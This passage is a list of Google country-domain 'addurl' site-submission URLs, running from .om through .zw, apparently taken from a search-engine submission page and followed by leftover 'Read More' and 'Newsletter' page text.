http://www.google.com.om/addurl
http://www.google.com.pa/addurl
http://www.google.com.pe/addurl
http://www.google.com.ph/addurl
http://www.google.com.pk/addurl
http://www.google.pl/addurl
http://www.google.pn/addurl
http://www.google.com.pr/addurl
http://www.google.pt/addurl
http://www.google.com.py/addurl
http://www.google.com.qa/addurl
http://www.google.ro/addurl
http://www.google.ru/addurl
http://www.google.rw/addurl
http://www.google.com.sa/addurl
http://www.google.com.sb/addurl
http://www.google.sc/addurl
http://www.google.se/addurl
http://www.google.com.sg/addurl
http://www.google.sh/addurl
http://www.google.si/addurl
http://www.google.sk/addurl
http://www.google.sn/addurl
http://www.google.sm/addurl
http://www.google.st/addurl
http://www.google.com.sv/addurl
http://www.google.co.th/addurl
http://www.google.com.tj/addurl
http://www.google.tk/addurl
http://www.google.tl/addurl
http://www.google.tm/addurl
http://www.google.to/addurl
http://www.google.com.tr/addurl
http://www.google.tt/addurl
http://www.google.com.tw/addurl
http://www.google.com.ua/addurl
http://www.google.co.ug/addurl
http://www.google.co.uk/addurl
http://www.google.com.uy/addurl
http://www.google.co.uz/addurl
http://www.google.com.vc/addurl
http://www.google.co.ve/addurl
http://www.google.vg/addurl
http://www.google.co.vi/addurl
http://www.google.com.vn/addurl
http://www.google.vu/addurl
http://www.google.ws/addurl
http://www.google.rs/addurl
http://www.google.co.za/addurl
http://www.google.co.zm/addurl
http://www.google.co.zw/addurl


Read More »

Newsletter